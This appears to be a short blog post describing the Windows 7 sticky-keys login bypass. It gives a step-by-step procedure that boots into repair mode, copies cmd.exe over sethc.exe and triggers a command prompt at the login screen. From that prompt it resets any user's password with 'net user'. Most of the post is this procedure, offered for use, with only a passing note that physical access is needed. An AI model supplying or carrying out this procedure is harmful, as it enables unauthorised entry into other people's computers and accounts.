I’ve been meaning to write about this for a long time. Windows 7 at its core has a huge security flaw that can easily be exploited to log into any machine you have physical access to.

It all starts at the password-protected login screen (winlogon.exe). There you find 2 important information:
– The user names
– The accessibility shortcuts still work (try hitting leftalt+leftshift+printscr from the login screen)

To enable those, winlogon.exe executes another exe: sethc.exe (you may have already the sticky-keys dialog popup that it triggers)

The flaw comes from the fact that winlogon executes c:\windows\system32\sethc.exe no matter what the file actually is.
If you can replace that file with a command prompt, this means that you can access the prompt from the login screen.
this can easily be exploited to change the user’s password and bypass the login screen:

Anyways, here is the 5 minutes procedure:
1/ Reset the computer, hit F8 for boot options and select “Repair your computer”
2/ Start a Command Prompt
3/ Make a backup of sethc.exe:
move c:\windows\system32\sethc.exe c:\windows\system32\sethc.exe.bck
4/ Copy your cmd prompt:
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
5/ Restart computer
6/ At login screen, trigger the sticky keys helper (ie. sethc.exe) by hitting shift 5 times
7/ With the new prompt, change the password:
net user [username] [pasword]

Don’t forget to restore the original sethc.exe file once you are done.

The downside of this method is, of course, the fact that you need physical access to the machine.
Still, the flaw has been existing for so long you wonder how come it’s still not patched up…